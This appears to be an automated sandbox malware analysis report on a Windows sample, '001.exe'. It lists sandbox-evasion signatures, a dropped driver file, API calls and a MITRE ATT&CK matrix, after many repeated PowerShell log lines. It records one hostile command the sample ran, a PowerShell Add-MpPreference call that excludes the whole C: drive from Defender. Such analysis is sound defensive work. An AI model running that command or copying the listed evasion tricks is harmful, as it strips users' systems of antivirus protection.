Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\001.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\001.exe Special instruction interceptor: First address: 140422FCE instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8028
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1660
Source: C:\Users\user\Desktop\001.exe Dropped PE file which has not been started: C:\Windows\Temp\1Qkj6qa_7944.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008935CC FindFirstFileA,FindNextFileA,FindClose,1_2_008935CC
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008B1C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,1_2_008B1C54
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_00845BCC GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,1_2_00845BCC
Source: 001.exe, 00000001.00000002.1774996102.00000000004F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008AC540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_008AC540
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_0085C634 GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,1_2_0085C634
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008B9204 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,1_2_008B9204
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008AC280 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_008AC280
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008A9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_008A9924
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008A9B18 SetUnhandledExceptionFilter,1_2_008A9B18

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\001.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\001.exe NtQuerySystemInformation: Direct from: 0x140327B7C
Source: C:\Users\user\Desktop\001.exe NtProtectVirtualMemory: Direct from: 0x1400026B1
Source: C:\Users\user\Desktop\001.exe NtProtectVirtualMemory: Direct from: 0x1402653DB
Source: C:\Users\user\Desktop\001.exe NtProtectVirtualMemory: Direct from: 0x14032A3A1
Source: C:\Users\user\Desktop\001.exe NtQuerySystemInformation: Direct from: 0x140329C78
Source: C:\Users\user\Desktop\001.exe NtProtectVirtualMemory: Direct from: 0x140323ACB
Source: C:\Users\user\Desktop\001.exe NtQuerySystemInformation: Direct from: 0x14025FCB9
Source: C:\Users\user\Desktop\001.exe NtQuerySystemInformation: Direct from: 0x14041A40C
Source: C:\Users\user\Desktop\001.exe NtQuerySystemInformation: Direct from: 0x140313F3A
Source: C:\Users\user\Desktop\001.exe NtProtectVirtualMemory: Direct from: 0x14025ED1B
Source: C:\Users\user\Desktop\001.exe Code function: GetLocaleInfoA,1_2_008BF2A8
Source: C:\Users\user\Desktop\001.exe Code function: GetLocaleInfoA,1_2_008AE5E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008A8310 GetSystemTimeAsFileTime,1_2_008A8310
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008AD80C _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_008AD80C
Source: C:\Users\user\Desktop\001.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008692C4 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,__swprintf_l,send,recv,closesocket,closesocket,closesocket,closesocket,1_2_008692C4
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008BF488 bind,1_2_008BF488
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_008BF540 listen,1_2_008BF540
Source: C:\Users\user\Desktop\001.exe Code function: 1_2_00858C10 htons,bind,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,1_2_00858C10
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 2 LSASS Driver; 1 DLL Side-Loading; 2 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: 1 Abuse Elevation Control Mechanism; 2 LSASS Driver; 1 DLL Side-Loading; 1 Access Token Manipulation; 2 Windows Service; 1 Process Injection; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 1 Masquerading; 121 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 1 Process Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 2 System Time Discovery; 1 File and Directory Discovery; 124 System Information Discovery; 321 Security Software Discovery; 1 Process Discovery; 121 Virtualization/Sandbox Evasion; 1 Application Window Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: 2 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.